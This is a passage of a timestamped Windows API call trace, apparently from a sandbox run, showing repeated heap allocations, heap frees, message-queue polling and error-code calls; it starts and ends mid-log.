1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd700 | out: hHeap=0x12c0000) returned 1 [0121.365] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.365] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef990 [0121.365] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.366] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9b0 [0121.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efaa0 [0121.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491858 [0121.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.366] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.366] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0121.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0121.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491858 [0121.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458898 [0121.366] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.366] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef960 [0121.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa00 [0121.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0121.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14588d8 [0121.366] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.366] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0121.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8e0 [0121.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0121.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a18 [0121.367] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.367] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9b0 [0121.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0121.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0121.367] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.367] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0121.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa50 [0121.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918d8 [0121.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0121.368] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.368] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.368] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa50 [0121.368] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef980 [0121.368] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0121.368] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.368] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.368] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.368] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef930 [0121.368] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa50 [0121.368] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491858 [0121.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b98 [0121.369] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.369] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef930 [0121.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8d0 [0121.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b58 [0121.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0121.369] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.369] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.371] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef970 [0121.371] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9a0 [0121.371] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491858 [0121.371] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.371] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.372] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.372] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef980 [0121.372] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.372] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491858 [0121.372] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0121.372] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.372] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.372] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9e0 [0121.372] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0121.372] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0121.372] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458898 [0121.372] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.373] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.373] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa60 [0121.373] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0121.373] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0121.373] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0121.373] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.373] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.373] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.373] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.373] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919f8 [0121.373] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b18 [0121.373] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.373] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa10 [0121.373] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.373] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdcd0 [0121.373] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.373] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2a8 [0121.373] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4c0 [0121.374] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0121.374] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd550 [0121.374] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.374] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0121.374] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.374] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.374] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa00 [0121.374] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef990 [0121.374] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0121.374] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b18 [0121.374] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.375] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.375] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9d0 [0121.375] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.375] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0121.375] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0121.375] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.375] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.375] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef970 [0121.375] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0121.375] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.375] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.375] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.376] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.376] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efaa0 [0121.376] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9d0 [0121.376] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.376] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458918 [0121.376] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.376] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.376] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.377] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0a0 [0121.377] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0121.377] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa10 [0121.377] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0121.377] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0121.377] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef900 [0121.377] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.377] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8d0 [0121.377] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0121.377] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0121.377] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0121.377] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.377] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0121.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b18 [0121.378] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.378] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef980 [0121.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa60 [0121.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0121.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0121.379] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.379] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.379] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0121.379] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef930 [0121.379] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0121.379] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d18 [0121.379] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.379] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9e0 [0121.379] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff190 [0121.379] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0121.380] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa00 [0121.380] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0121.380] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa10 [0121.380] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.380] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef960 [0121.380] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918b8 [0121.380] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0121.380] GetLastError () returned 0x0 [0121.380] SetLastError (dwErrCode=0x0) [0121.380] GetLastError () returned 0x0 [0121.381] SetLastError (dwErrCode=0x0) [0121.381] GetLastError () returned 0x0 [0121.381] SetLastError (dwErrCode=0x0) [0121.381] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd430 [0121.382] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0121.382] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9f0 [0121.382] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef900 [0121.382] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff348 [0121.382] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd550 [0121.382] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd598 [0121.382] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa70 [0121.382] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff460 [0121.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4c0 [0121.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1491af8 [0121.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x14be0a8 [0121.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0121.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef970 [0121.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1491a38 [0121.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9c0 [0121.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff280 [0121.384] CharLowerBuffW (in: lpsz="byte[115201]", cchLength=0xc | out: lpsz="byte[115201]") returned 0xc [0121.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x14bdf28 [0121.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0121.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef940 [0121.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0121.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef970 [0121.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0121.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa70 [0121.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0121.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa60 [0121.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0121.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0121.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0121.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa70 | out: hHeap=0x12c0000) returned 1 [0121.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0121.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef970 | out: hHeap=0x12c0000) returned 1 [0121.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff280 | out: hHeap=0x12c0000) returned 1 [0121.386] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9c0 | out: hHeap=0x12c0000) returned 1 [0121.386] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff348 | out: hHeap=0x12c0000) returned 1 [0121.386] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.386] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0121.386] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0121.386] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0121.386] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff190 | out: hHeap=0x12c0000) returned 1 [0121.386] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9e0 | out: hHeap=0x12c0000) returned 1 [0121.386] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd448 | out: hHeap=0x12c0000) returned 1 [0121.387] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1491858 [0121.387] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x14be048 [0121.387] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0121.387] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef930 [0121.387] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0121.387] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.387] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdf28 | out: hHeap=0x12c0000) returned 1 [0121.387] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a38 | out: hHeap=0x12c0000) returned 1 [0121.387] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, 